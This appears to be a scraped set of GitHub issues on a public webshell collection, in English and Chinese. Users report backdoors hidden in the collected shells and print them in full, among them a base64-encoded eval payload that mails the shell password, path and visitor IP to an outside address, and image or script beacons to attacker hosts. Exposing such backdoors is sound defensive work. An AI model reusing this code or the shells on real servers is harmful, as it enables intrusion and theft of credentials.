https://github.com/tennc/webshell/blob/master/aspx/111.aspx

https://github.com/twepl/wso

https://github.com/SelfDown/moon/

Hey there!

I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

In the code: eg: /etc/passwd<br><? ... use the short tag, not all servers support this. Change to <?php

webshell/138shell/R/r57 Shell.php.txt

https://github.com/tennc/webshell/blob/master/138shell/R/r57%20Shell.php.txt#L1025

https://github.com/tennc/webshell/blob/master/138shell/R/r57%20Shell.php.txt#L1037

In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\"> send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.

Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>

The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);

This send the referer site to other persons.

This shell is dirty.

webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php这个目录下的
1268行存在后门,注明一下,这个还是不错的一个shell.

$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff)); 

解码过后

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.6 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  **if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);

in Line 75 you can see this code
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); when i decode it i see mail() function to send (path ,password ,visitor ip) to this email [email protected] @mail("[email protected]",$judul,$body,$auth_pass);

http://otherthings.cdn.sinacloud.net/wooyun.org.highest.compression.7z

如题

谢谢提供webshell的收集。

我fork了你的webshell，但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。
我看到你的readme写到：“所有shell 本人不保证是否有后门，但是自己上传的绝不会故意加后门”
可否在你的readme中加上你自己确认没有病毒的shell的文件列表，这样我可以少检查很多shells :）

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php#L198

好歹给个密码

https://www.douyin.com/user/self?modal_id=7335646668769021199&showTab=post

支持shell、 文件管理，分屏。支持录屏回放

The following submodule repo reports a 404 error:

[submodule "ysrc/webshell-sample"]
	path = ysrc/webshell-sample
	url = https://github.com/ysrc/webshell-sample

If the repo is no longer there, can this submodule be deleted?

php/ghost.php存在以下后门

<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***.***.***/ghost.php&p=ghost"/>

If you try to run this file on a newer webserver:

webshell/web-malware-collection-13-06-2012/PHP/c99.txt

You get lots of php errors

could you update the shell to php7 pls?

这个代码有问题呀，next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in
asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in
我的测试环境是PHP5.6.8

Hi guys! First off, thanks for your page.
I'm looking mysql shell-client for jsp. (I just want browse tables,columns)
I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?

wl168168.php is a webshell?
i have never know about it.
can you give me a link about it? 3q.

Line855:

uc(dx()) = "http://adgoog.gicp.net/index.asp?ct="